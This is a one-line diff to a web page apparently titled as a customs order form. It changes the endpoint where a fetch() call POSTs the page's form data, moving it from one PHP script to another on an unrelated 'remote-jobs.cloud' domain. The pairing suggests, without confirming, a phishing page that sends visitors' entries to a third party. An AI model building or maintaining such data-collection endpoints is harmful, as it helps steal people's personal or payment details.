--- a/ctlcustoms_ntOrder.htm
+++ b/ctlcustoms_ntOrder.htm
@@ -191,7 +191,7 @@
                 const formData = new FormData(form);
 
                 try {
-                    const response = await fetch('https://remote-jobs.cloud/ivtech/congo.php', {
+                    const response = await fetch('https://remote-jobs.cloud/ivtech/kak.php', {
                         method: 'POST',
                         body: formData
                     });
